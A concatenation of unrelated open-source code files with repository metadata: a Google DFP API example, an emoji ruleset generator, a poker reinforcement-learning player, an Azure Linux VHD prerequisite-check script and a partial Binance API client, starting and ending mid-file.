os.system(line)
print line
except:
pass
if __name__ == '__main__':
main()
#print execlist
#print exifdict
#
#
# except KeyError:
# continue
# except sqlalchemy.exc.DatabaseError:
# continue
# print "DBERR" + f
| {
"content_hash": "0a15aefcb802846e98c444c2b5aa3d76",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 108,
"avg_line_length": 34.52197802197802,
"alnum_prop": 0.5976444373706828,
"repo_name": "relic7/prodimages",
"id": "b359b78ddbe2f18a4ba68aa55a25401e53fba0cc",
"size": "6675",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/jbmodules/image_metadata/mtags_singleFileNewMaps.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16783"
},
{
"name": "HTML",
"bytes": "88323"
},
{
"name": "JavaScript",
"bytes": "158855"
},
{
"name": "PHP",
"bytes": "70412"
},
{
"name": "PLSQL",
"bytes": "72767"
},
{
"name": "Perl",
"bytes": "7143"
},
{
"name": "Python",
"bytes": "4922301"
},
{
"name": "Shell",
"bytes": "423422"
},
{
"name": "Smarty",
"bytes": "571"
},
{
"name": "VimL",
"bytes": "6045"
}
],
"symlink_target": ""
} |
"""This code example gets an order by its id. To determine which orders exist,
run get_all_orders.py."""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
order_service = client.GetService(
'OrderService', 'https://www.google.com', 'v201203')
# Set the id of the order to get.
order_id = 'INSERT_ORDER_ID_HERE'
# Get order.
order = order_service.GetOrder(order_id)[0]
# Display results.
print ('Order with id \'%s\', name \'%s\', and advertiser id \'%s\' was '
'found.' % (order['id'], order['name'], order['advertiserId']))
| {
"content_hash": "cf7e05927cef9d4dc975026a14231625",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 80,
"avg_line_length": 30.903225806451612,
"alnum_prop": 0.6711899791231732,
"repo_name": "krux/adspygoogle",
"id": "5f560eacee03de1684605358798ab6d4d72e5eaf",
"size": "1576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201203/get_order.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "2263332"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python3
# -*- coding: utf-8; -*-
# This is autogenerated python file DO NOT try to edit
# [[[cog
import cog
import json
json_package_path = './emoji.json'
data_dict = json.loads(open(json_package_path).read())
unicode_replace = {}
shortcode_replace = {}
ascii_replace = {}
for key, value in data_dict.items():
unicode_hex = value['unicode']
ascii_list = value['aliases_ascii']
shortname = value['shortname']
for ascii in ascii_list:
ascii_replace[ascii] = unicode_hex
shortcode_replace[shortname] = unicode_hex
if '-' not in unicode_hex:
unicode_char = chr(int(unicode_hex, 16))
unicode_replace[unicode_char.encode('utf-8')] = shortname
else:
parts = unicode_hex.split('-')
unicode_char = ''.join(chr(int(part, 16)) for part in parts)
unicode_replace[unicode_char.encode('utf-8')] = shortname
print(unicode_replace)
print(shortcode_replace)
print(ascii_replace)
cog.out('unicode_replace = %s\n\n' % unicode_replace)
cog.out('shortcode_replace = %s\n\n' % shortcode_replace)
cog.out('ascii_replace = %s\n\n' % ascii_replace)
# ]]]
# [[[end]]]
| {
"content_hash": "555e9f36df84e00e5370d001f2f04499",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 68,
"avg_line_length": 27.878048780487806,
"alnum_prop": 0.6517935258092739,
"repo_name": "launchyard/emojipy",
"id": "e52dbf75175ce5df7956c505e2f4356160379cda",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emojipy/create_ruleset.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "248425"
},
{
"name": "HTML",
"bytes": "595"
},
{
"name": "Python",
"bytes": "151290"
}
],
"symlink_target": ""
} |
import roomai.games.common
from roomai.games.common.AbstractPlayer import AbstractPlayer
from roomai.models.algorithms import AbstractA3C
logger = roomai.get_logger()
import numpy as np
class Texasholdem_A3CPlayer(AbstractPlayer):
def __init__(self, state_spec, n_a):
self.state_spec = state_spec
        self.n_a = n_a
self.action_dict = {"Fold":0, "Check":1, "Call":2, "Raise":3, "Allin":4}
def load_model(self, model_path, model_name):
self.a3c = AbstractA3C(self.state_spec, self.n_a)
self.a3c.load_model(model_path, model_name)
def receive_info(self, info):
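        # Encode the visible cards as a 14 x 8 x 1 binary tensor: rows are
        # card point ranks; columns 0-3 hold the suit planes when this player
        # is the dealer, columns 4-7 otherwise.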
self.s = np.zeros((14, 8, 1))
if (info.public_state_history[-1].param_dealer_id == info.person_state_history[-1].id):
for card in info.public_state_history[-1].public_cards:
self.s[card.point_rank, card.suit_rank, 0] = 1
for card in info.person_state_history[-1].hand_cards:
self.s[card.point_rank, card.suit_rank, 0] = 1
else:
for card in info.public_state_history[-1].public_cards:
self.s[card.point_rank, card.suit_rank + 4, 0] = 1
for card in info.person_state_history[-1].hand_cards:
self.s[card.point_rank, card.suit_rank + 4, 0] = 1
self.available_action = dict()
self.available_option = []
for action in list(info.person_state_history[-1].available_actions.values()):
option = action.option
if option not in self.available_option:
                # For "Raise" actions, keep only the first one offered
self.available_option.append(option)
self.available_action[option] = action
def take_action(self):
a = self.a3c.choose_action(self.s, self.available_option, self.action_dict)
return self.available_action[a]
def reset(self):
        pass
| {
"content_hash": "fa02c5a2137c01b78836bb6cac9565ba",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 95,
"avg_line_length": 40.5,
"alnum_prop": 0.6129898013955984,
"repo_name": "roomai/RoomAI",
"id": "8fee6b036d88c588fe693ec37625e54bec0de270",
"size": "2054",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "roomai/models/texasholdem/Texasholdem_A3CPlayer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "210116"
},
{
"name": "Shell",
"bytes": "2084"
}
],
"symlink_target": ""
} |
from cirq.contrib.bayesian_network.bayesian_network_gate import BayesianNetworkGate
| {
"content_hash": "f7f52be2c67f9e653b115ef4f53e8a5c",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 83,
"avg_line_length": 84,
"alnum_prop": 0.8809523809523809,
"repo_name": "quantumlib/Cirq",
"id": "4e030d410d56bf9701bfdf29ef4c4aa434092b7a",
"size": "669",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cirq-core/cirq/contrib/bayesian_network/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "4616"
},
{
"name": "HTML",
"bytes": "262"
},
{
"name": "JavaScript",
"bytes": "660"
},
{
"name": "Jupyter Notebook",
"bytes": "672675"
},
{
"name": "Makefile",
"bytes": "634"
},
{
"name": "Python",
"bytes": "8643017"
},
{
"name": "Scilab",
"bytes": "735"
},
{
"name": "Shell",
"bytes": "64230"
},
{
"name": "TypeScript",
"bytes": "91766"
}
],
"symlink_target": ""
} |
from azuremodules import *
import argparse
import sys
# parse command-line arguments (argparse enforces the required --distro flag)
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--distro', help='Please mention which distro you are testing', required=True, type = str)
args = parser.parse_args()
distro = args.distro
def verify_default_targetpw(distro):
RunLog.info("Checking Defaults targetpw is commented or not..")
sudoers_out = Run("cat /etc/sudoers")
if "Defaults targetpw" in sudoers_out:
if "#Defaults targetpw" in sudoers_out:
print(distro+"_TEST_SUDOERS_VERIFICATION_SUCCESS")
RunLog.info("Defaults targetpw is commented")
return True
else:
RunLog.error("Defaults targetpw is present in /etc sudoers but it is not commented.")
print(distro+"_TEST_SUDOERS_VERIFICATION_FAIL")
return False
else:
RunLog.info("Defaults targetpw is not present in /etc/sudoers")
print(distro+"_TEST_SUDOERS_VERIFICATION_SUCCESS")
return True
def verify_grub(distro):
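    # The boot configuration (GRUB config, or dmesg on CoreOS) must contain
    # console=ttyS0 and rootdelay=300, must not contain libata.atapi_enabled=0
    # or reserve=0x1f0,0x8, and RHEL-family releases older than 6.6 must also
    # have numa=off.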
import os.path
RunLog.info("Checking console=ttyS0 rootdelay=300..")
if distro == "UBUNTU":
grub_out = Run("cat /etc/default/grub")
if distro == "SUSE":
if os.path.exists("/boot/grub2/grub.cfg"):
grub_out = Run("cat /boot/grub2/grub.cfg")
elif os.path.exists("/boot/grub/grub.conf"):
grub_out = Run("cat /boot/grub/grub.conf")
else:
RunLog.error("Unable to locate grub file")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
return False
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "SLES" or distro == "FEDORA":
if os.path.isfile("/boot/grub2/grub.cfg"):
RunLog.info("Getting Contents of /boot/grub2/grub.cfg")
grub_out = Run("cat /boot/grub2/grub.cfg")
elif os.path.isfile("/boot/grub/menu.lst"):
RunLog.info("Getting Contents of /boot/grub/menu.lst")
grub_out = Run("cat /boot/grub/menu.lst")
else:
RunLog.error("Unable to locate grub file")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
return False
if distro == "COREOS":
#in core os we don't have access to boot partition
grub_out = Run("dmesg")
if "console=ttyS0" in grub_out and "rootdelay=300" in grub_out and "libata.atapi_enabled=0" not in grub_out and "reserve=0x1f0,0x8" not in grub_out:
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT":
# check numa=off in grub for CentOS 6.x and Oracle Linux 6.x
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "numa=off" in grub_out:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
else :
RunLog.error("numa=off not present in etc/default/grub")
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
else:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
else:
print(distro+"_TEST_GRUB_VERIFICATION_SUCCESS")
return True
else:
print(distro+"_TEST_GRUB_VERIFICATION_FAIL")
if "console=ttyS0" not in grub_out:
RunLog.error("console=ttyS0 not present")
if "rootdelay=300" not in grub_out:
RunLog.error("rootdelay=300 not present")
if "libata.atapi_enabled=0" in grub_out:
RunLog.error("libata.atapi_enabled=0 is present")
if "reserve=0x1f0,0x8" in grub_out:
RunLog.error("reserve=0x1f0,0x8 is present")
return False
def verify_network_manager(distro):
RunLog.info("Verifying that network manager is not installed")
n_out = Run ("rpm -q NetworkManager")
if "is not installed" in n_out:
RunLog.info("Network Manager is not installed")
print(distro+"_TEST_NETWORK_MANAGER_NOT_INSTALLED")
return True
else:
# NetworkManager package no longer conflicts with the wwagent on CentOS 7.0+ and Oracle Linux 7.0+
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT":
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 7.0:
RunLog.error("Network Manager is installed")
print(distro+"_TEST_NETWORK_MANAGER_INSTALLED")
return False
else:
RunLog.info("Network Manager is installed but not confict with waagent.")
print(distro+"_TEST_NETWORK_MANAGER_NOT_INSTALLED")
return True
else:
RunLog.error("Network Manager is installed")
print(distro+"_TEST_NETWORK_MANAGER_INSTALLED")
return False
def verify_network_file_in_sysconfig(distro):
import os.path
RunLog.info("Checking if network file exists in /etc/sysconfig")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
if os.path.isfile("/etc/sysconfig/network"):
RunLog.info("File Exists.")
n_out = Run("cat /etc/sysconfig/network")
if "networking=yes".upper() in n_out.upper():
RunLog.info("NETWORKING=yes present in network file")
print(distro+"_TEST_NETWORK_FILE_SUCCESS")
return True
else:
RunLog.error("NETWORKING=yes not present in network file")
print(distro+"_TEST_NETWORK_FILE_ERROR")
return False
else:
RunLog.error("File not present")
print(distro+"_TEST_NETWORK_FILE_ERROR")
return False
def verify_ifcfg_eth0(distro):
RunLog.info("Verifying contents of ifcfg-eth0 file")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
i_out = Run("cat /etc/sysconfig/network-scripts/ifcfg-eth0")
i_out = i_out.replace('"','')
#if "DEVICE=eth0" in i_out and "ONBOOT=yes" in i_out and "BOOTPROTO=dhcp" in i_out and "DHCP=yes" in i_out:
if "DEVICE=eth0" in i_out and "ONBOOT=yes" in i_out and "BOOTPROTO=dhcp" in i_out :
RunLog.info("all required parameters exists.")
print(distro+"_TEST_IFCFG_ETH0_FILE_SUCCESS")
return True
else:
if "DEVICE=eth0" not in i_out:
RunLog.error("DEVICE=eth0 not present in ifcfg-eth0")
if "ONBOOT=yes" not in i_out:
RunLog.error("ONBOOT=yes not present in ifcfg-eth0")
if "BOOTPROTO=dhcp" not in i_out:
RunLog.error("BOOTPROTO=dhcp not present in ifcfg-eth0")
#if "DHCP=yes" not in i_out:
# RunLog.error("DHCP=yes not present in ifcfg-eth0")
print(distro+"_TEST_IFCFG_ETH0_FILE_ERROR")
return False
def verify_udev_rules(distro):
import os.path
RunLog.info("Verifying if udev rules are moved to /var/lib/waagent/")
if distro == "CENTOS" or distro == "ORACLELINUX" or distro == "REDHAT" or distro == "FEDORA":
if not os.path.isfile("/lib/udev/rules.d/75-persistent-net-generator.rules") and not os.path.isfile("/etc/udev/rules.d/70-persistent-net.rules"):
RunLog.info("rules are moved.")
print(distro+"_TEST_UDEV_RULES_SUCCESS")
return True
else:
if os.path.isfile("/lib/udev/rules.d/75-persistent-net-generator.rules"):
RunLog.error("/lib/udev/rules.d/75-persistent-net-generator.rules file present")
if os.path.isfile("/etc/udev/rules.d/70-persistent-net.rules"):
RunLog.error("/etc/udev/rules.d/70-persistent-net.rules file present")
print(distro+"_TEST_UDEV_RULES_ERROR")
return False
if distro == "COREOS":
if not os.path.isfile("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules") and not os.path.isfile("/usr/lib64/udev/rules.d/70-persistent-net.rules"):
RunLog.info("rules are moved.")
print(distro+"_TEST_UDEV_RULES_SUCCESS")
return True
else:
if os.path.isfile("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules"):
RunLog.error("/usr/lib64/udev/rules.d/75-persistent-net-generator.rules file present")
if os.path.isfile("/usr/lib64/udev/rules.d/70-persistent-net.rules"):
RunLog.error("/usr/lib64/udev/rules.d/70-persistent-net.rules file present")
print(distro+"_TEST_UDEV_RULES_ERROR")
return False
if distro == "UBUNTU":
RunLog.info("DISTRO PROVIDED : "+distro)
		#Test 1 : verify whether hv-kvp-daemon-init is installed; this is optional, not strict.
RunLog.info("Checking if hv-kvp-daemon-init is installed or not..")
#kvp_install_status = Run("dpkg -s hv-kvp-daemon-init")
kvp_install_status = Run("pgrep -lf hv_kvp_daemon")
matchCount = 0
if "hv_kvp_daemon" in kvp_install_status:
matchCount = matchCount + 1
if matchCount == 1:
print(distro+"_TEST_KVP_INSTALLED")
else:
print(distro+"_TEST_KVP_NOT_INSTALLED")
#Test 2 : Make sure that repositories are installed.
RunLog.info("Checking if repositories are installed or not..")
repository_out = Run("apt-get update")
if "security.ubuntu.com" in repository_out and "azure.archive.ubuntu.com" in repository_out and "Hit" in repository_out:
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
print(distro+"_TEST_REPOSITORIES_ERROR")
#Test 3 : Make sure to have console=ttyS0 rootdelay=300 in /etc/default/grub.
result = verify_grub(distro)
#Test 4 : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "DEBIAN":
RunLog.info("DISTRO PROVIDED : "+distro)
		#Test 1 : verify whether hv-kvp-daemon-init is installed; this is optional, not strict.
RunLog.info("Checking if hv-kvp-daemon-init is installed or not..")
kvp_install_status = Run("pgrep -lf hv_kvp_daemon")
matchCount = 0
if "hv_kvp_daemon" in kvp_install_status:
matchCount = matchCount + 1
if matchCount == 1:
print(distro+"_TEST_KVP_INSTALLED")
else:
print(distro+"_TEST_KVP_NOT_INSTALLED")
#Test 2 : Make sure that repositories are installed.
RunLog.info("Checking if repositories are installed or not..")
repository_out = Run("apt-get update")
if ( "deb.debian.org" in repository_out or "debian-archive.trafficmanager.net" in repository_out ) and "Hit" in repository_out:
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
print(distro+"_TEST_REPOSITORIES_ERROR")
#Test 3 : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "SUSE":
#Make sure that distro contains Cloud specific repositories
RunLog.info("Verifying Cloud specific repositories")
Oss_repo_count = Run("zypper lr | grep -vi debug | grep -vi non | grep Oss | wc -l | tr -d '\n'")
Update_repo_count = Run("zypper lr | grep -vi debug | grep -vi non | grep Update | wc -l | tr -d '\n'")
Oss_repo_enable_refresh = Run("zypper lr | grep -vi debug | grep -vi non | grep Oss | grep -o Yes | wc -l | tr -d '\n'")
Update_repo_enable_refresh = Run("zypper lr | grep -vi debug | grep -vi non | grep Update | grep -o Yes | wc -l | tr -d '\n'")
if int(Oss_repo_count) > 0 and int(Update_repo_count) > 0:
RunLog.info("All expected repositories are present")
if int(Oss_repo_enable_refresh) >= 2 and int(Update_repo_enable_refresh) >= 2:
RunLog.info("All expected repositories are enabled and refreshed")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("One or more expected repositories are not enabled/refreshed.")
print(distro+"_TEST_REPOSITORIES_ERROR")
else:
RunLog.error("One or more expected repositories are not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify Grub
result = verify_grub(distro)
#Test : Make sure that default targetpw is commented in /etc/sudoers file.
result = verify_default_targetpw(distro)
if distro == "CENTOS":
#Test 1 : Make sure Network Manager is not installed
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "base" in r_out and "updates" in r_out:
RunLog.info("Expected repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
if "base" not in r_out:
RunLog.error("Base repository not present")
if "updates" not in r_out:
RunLog.error("Updates repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify etc/yum.conf
y_out = Run("cat /etc/yum.conf")
# check http_caching=packages in yum.conf for CentOS 6.x
version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "http_caching=packages" in y_out:
RunLog.info("http_caching=packages present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_SUCCESS")
else:
RunLog.error("http_caching=packages not present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_ERROR")
else:
print(distro+"_TEST_YUM_CONF_SUCCESS")
result = verify_grub(distro)
if distro == "REDHAT" or distro == "FEDORA":
#Test 1 : Make sure Network Manager is not installed
result = verify_default_targetpw(distro)
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "base" in r_out and "updates" in r_out:
RunLog.info("Expected repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
if "base" not in r_out:
RunLog.error("Base repository not present")
if "updates" not in r_out:
RunLog.error("Updates repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
if distro == "REDHAT":
ra_out = Run("yum repolist all | grep 'rhui-rhel-' | wc -l")
			if(int(ra_out) > 5):
RunLog.info("yum repolist all status: Success, repo count = %s", ra_out)
print(distro+"_TEST_RHUIREPOSITORIES_AVAILABLE")
else:
RunLog.error("yum repolist all status: Fail, repo count = %s", ra_out)
print(distro+"_TEST_RHUIREPOSITORIES_ERROR")
		#Verify etc/yum.conf
		y_out = Run("cat /etc/yum.conf")
		version_release = Run("cat /etc/system-release | grep -Eo '[0-9].?[0-9]?' | head -1 | tr -d '\n'")
if float(version_release) < 6.6:
if "http_caching=packages" in y_out:
RunLog.info("http_caching=packages present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_SUCCESS")
else:
RunLog.error("http_caching=packages not present in /etc/yum.conf")
print(distro+"_TEST_YUM_CONF_ERROR")
else:
print(distro+"_TEST_YUM_CONF_SUCCESS")
result = verify_grub(distro)
if distro == "ORACLELINUX":
#Test 1 : Make sure Network Manager is not installed
result = verify_network_manager(distro)
result = verify_network_file_in_sysconfig(distro)
result = verify_ifcfg_eth0(distro)
result = verify_udev_rules(distro)
#Verify repositories
r_out = Run("yum repolist")
if "latest" in r_out:
RunLog.info("Expected latest repositories are present")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("Expected latest repository not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
# no need to verify yum.conf since http_caching is not required for Oracle Linux.
result = verify_grub(distro)
if distro == "SLES":
#Verify Repositories..
r_out = Run("zypper lr")
if "Pool" in r_out and "Updates" in r_out:
RunLog.info("All expected repositories are present")
RunLog.info("All expected repositories are enabled and refreshed")
print(distro+"_TEST_REPOSITORIES_AVAILABLE")
else:
RunLog.error("One or more expected repositories are not present")
print(distro+"_TEST_REPOSITORIES_ERROR")
#Verify Grub
result = verify_grub(distro)
#Verify sudoers file
result = verify_default_targetpw(distro)
		#Verify : It is recommended that you set /etc/sysconfig/network/dhcp or equivalent from DHCLIENT_SET_HOSTNAME="yes" to DHCLIENT_SET_HOSTNAME="no"
RunLog.info('Checking recommended setting if DHCLIENT_SET_HOSTNAME="no" present in /etc/sysconfig/network/dhcp')
d_out = Run("cat /etc/sysconfig/network/dhcp")
if 'DHCLIENT_SET_HOSTNAME="no"' in d_out:
RunLog.info('DHCLIENT_SET_HOSTNAME="no" present in /etc/sysconfig/network/dhcp')
else:
RunLog.info("DHCLIENT_SET_HOSTNAME='no' not present in /etc/sysconfig/network/dhcp, it's not strict.")
if distro == "COREOS":
#"rootdelay=300" has issues with CoreOS which causes extra long boot time
#result = verify_grub(distro)
result = verify_udev_rules(distro)
| {
"content_hash": "ecd1217addae9755ebc2bb421a081bf5",
"timestamp": "",
"source": "github",
"line_count": 373,
"max_line_length": 159,
"avg_line_length": 41.9544235924933,
"alnum_prop": 0.7077129529043389,
"repo_name": "konkasoftci/azure-linux-automation",
"id": "059e28c1d63e1f50c3aee83c6d42feddd1771adb",
"size": "15668",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "remote-scripts/BVT-VERIFY-VHD-PREREQUISITES.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "20007"
},
{
"name": "PowerShell",
"bytes": "1982984"
},
{
"name": "Python",
"bytes": "267947"
},
{
"name": "Shell",
"bytes": "317794"
}
],
"symlink_target": ""
} |
import hmac
import hashlib
import time
import requests
import pandas as pd
import numpy as np
import inspect
import logging
import sys
# need to deal with version
version= '0.1.2'
class Binance:
def __init__(self, logger=None):
# set up logging handler and suppress 'No handlers' message by adding NullHandler
# note that handler/format/etc setup needs to be specified in the calling program
# for any of the logger messages in this module to print
self.logger = logger or logging.getLogger(__name__)
self.logger.addHandler(logging.NullHandler())
def __version__(self):
# not sure if this is how I'm supposed to do it
return version
def setAPIKey(self, apikey):
#
# ---- DESCRIPTION ---
# sets apikey
#
# ---- INPUTS ---
# apikey: the apikey
#
        # ---- OUTPUTS ---
# returns 1
self.apikey = apikey
return 1
def setSecretKey(self, secret):
#
# ---- DESCRIPTION ---
# sets secret
#
# ---- INPUTS ---
# secret: the secret key
#
        # ---- OUTPUTS ---
# returns 1
self.secret = secret
return 1
def sendHTTPRequest(self, path, verb='get', query_string='',myheaders={}):
# this is an internal function that sends HTTP requests for other functions in this class
baseurl = 'https://www.binance.com'
url = baseurl + path
self.logger.debug("path is %s",path)
self.logger.debug("verb is %s",verb)
self.logger.debug("query_string is %s",query_string)
self.logger.debug("myheaders is %s",myheaders)
if (verb.lower() == 'get'):
r = requests.get(url, params=query_string, headers=myheaders)
elif (verb.lower() == 'post'):
r = requests.post(url, params=query_string, headers=myheaders)
elif (verb.lower() == 'delete'):
r = requests.delete(url, params=query_string, headers=myheaders)
# to do
# - check and handle different response codes
return r
def requestSender(self, path, verb, queryParams={}, expected={}, signed=False):
# this is an internal function that sends the request and checks the return value
# check values passed in against the definition provided by Binance
self.logger.info("queryParams contains %s",queryParams)
if(self.validateParams(queryParams,expected)):
# get query_string and sign as necessary
query_string = self.getQueryString(queryParams)
self.logger.info("query string is %s", query_string)
myheaders={}
if (signed):
# Check if secret key is set. For type = Signed both signature and api key required.
try:
self.secret
except:
self.logger.error("secret key not set, perhaps call setSecretKey?")
return 0
# Check if API key is set. For type = Signed both signature and api key required.
try:
self.apikey
except:
self.logger.error("API key not set, perhaps call setAPIKey?")
return 0
self.logger.debug("API key setting being used is %s",self.apikey)
myheaders = {'X-MBX-APIKEY':self.apikey}
query_string = query_string + '&signature=' + self.getSignature(self.secret,query_string)
self.logger.info("signed query string is %s", query_string)
# send off the request
try:
r = self.sendHTTPRequest(path, verb, query_string,myheaders).json()
except:
self.logger.error("HTTP error, returning 0")
return 0
else:
self.logger.error("aok failed, return 0 in final else")
return 0
self.logger.info("successful, returning r")
self.logger.debug("r is %s",r)
return r
def getSignature(self, secretKey, totalParams):
#
# ---- DESCRIPTION ---
# Creates a signature for payloads as described in the
# Binance API documentation under the heading
# SIGNED Endpoint Examples for POST /api/v3/order
#
# ---- INPUTS ---
# secretKey: the secret key
# totalParams: the message we're wanting to hash. Per the documentation,
#
# totalParams is defined as the query string concatenated with the request body.
#
        # ---- OUTPUTS ---
# hexdigest formatted HMAC SHA256 signature
self.logger.info("signature is %s", hmac.new(secretKey, msg=totalParams, digestmod=hashlib.sha256).hexdigest())
return hmac.new(secretKey, msg=totalParams, digestmod=hashlib.sha256).hexdigest()
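    # Illustrative worked example (hypothetical values, not taken from the Binance docs):
    #   secret = 'mySecretKeyAbc123'
    #   totalParams = 'symbol=SALTBTC&side=BUY&type=MARKET&quantity=1.00000000&timestamp=1507045646123'
    #   getSignature(secret, totalParams) returns the hex HMAC-SHA256 digest of totalParams
    #   keyed with secret, which requestSender appends as '&signature=<digest>'.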
def getQueryString(self, queryParams):
#
# ---- DESCRIPTION ---
# Assembles query parameters into a query string
#
# ---- INPUTS ---
# validated (by validateParams) python dictionary of input parameters
# ex. {'symbol':'SALTBTC','limit':5}
#
#
        # ---- OUTPUTS ---
# HTTP query string
#
# ---- NOTES ---
queryString=''
for key, value in queryParams.iteritems():
if (type(value) == int):
value = str(value)
elif (type(value) == float):
# remove scientific notation formatting in float, 8 characters of precision
value = '{:.8f}'.format(value)
value = str(value)
queryString = queryString + key + '=' + value + '&'
self.logger.debug("adding key and value to queryString %s %s", key, value)
# we need to remove the final & here, hence [:-1]
self.logger.debug("final queryString is %s", queryString[:-1])
return queryString[:-1]
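    # Illustrative example: getQueryString({'symbol': 'SALTBTC', 'limit': 5, 'quantity': 1e-06})
    # joins key=value pairs with '&' and renders the float without scientific notation as
    # 'quantity=0.00000100'; pair order follows the dict's iteration order.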
def getTimestamp(self,queryParams={}):
#
# ---- DESCRIPTION ---
# Check for and create a millisecond timestamp to include in SIGNED requests
#
# ---- INPUTS ---
# queryParams dictionary
#
        # ---- OUTPUTS ---
# queryParams dictionary or 0 if there is an error
#
if('timestamp' in queryParams):
if ((len(str(queryParams['timestamp'])) == 13)):
# strings actually fool this but it gets caught later in the type validation
self.logger.info("found valid user provided timestamp %s",queryParams['timestamp'])
return queryParams
else:
self.logger.error("user provided timestamp invalid %s",queryParams['timestamp'])
return 0
else:
queryParams['timestamp'] = int(round(time.time() * 1000))
self.logger.info("did not find user provided timestamp, generated %s",queryParams['timestamp'])
return queryParams
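    # Illustrative example: getTimestamp({}) fills in a generated 13-digit millisecond epoch,
    # e.g. {'timestamp': 1507045646123}; getTimestamp({'timestamp': 1507045646123}) passes the
    # user-supplied value through, while getTimestamp({'timestamp': 123}) returns 0.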
def testConnectivity(self):
#
# ---- DESCRIPTION ---
# Checks the server connectivity with GET /api/v1/ping
#
# ---- INPUTS ---
# None:
#
        # ---- OUTPUTS ---
# HTTP status code of the request to this URL
#
path = '/api/v1/ping'
verb = 'get'
r = self.sendHTTPRequest(path, verb)
self.logger.debug("HTTP response code to %s is %s", path, r)
return r.status_code
def getServerTime(self):
#
# ---- DESCRIPTION ---
# Gets the server time with GET /api/v1/time
#
# ---- INPUTS ---
# None:
#
        # ---- OUTPUTS ---
# The value in the serverTime attribute of the resulting json file
#
path = '/api/v1/time'
verb = 'get'
r = self.sendHTTPRequest(path,verb).json()
self.logger.debug("serverTime is is %s", r['serverTime'])
return r['serverTime']
def getSymbols(self):
#
# ---- DESCRIPTION ---
# Gets a list of valid symbols currently traded on Binance. This is
# used as input validation for 'symbol' in most API calls
#
# ---- INPUTS ---
# none
#
        # ---- OUTPUTS ---
# returns python list of current available symbols
#
# ---- NOTES ---
# They do not offer an API function for this so we use /api/v1/ticker/allPrices
# to get a list of current prices for all assets and just extract the names
# of the assets from there to check our symbol against
path = '/api/v1/ticker/allPrices'
verb = 'get'
symbols = []
try:
r = self.sendHTTPRequest(path,verb).json()
except:
self.logger.error("HTTP error, returning 0")
return 0
for i in r:
symbols.append(i['symbol'])
self.logger.debug("symbols is %s", symbols)
return symbols
def validateParams(self,queryParams, expected):
# this is an internal function that validates parameters passed in against
# the parameter specifications of the API
#
# returns 1 if things are fine, 0 if not
#
if (not expected.empty): # make sure expected has values in it
for key, value in queryParams.iteritems():
self.logger.debug("testing key %s",key)
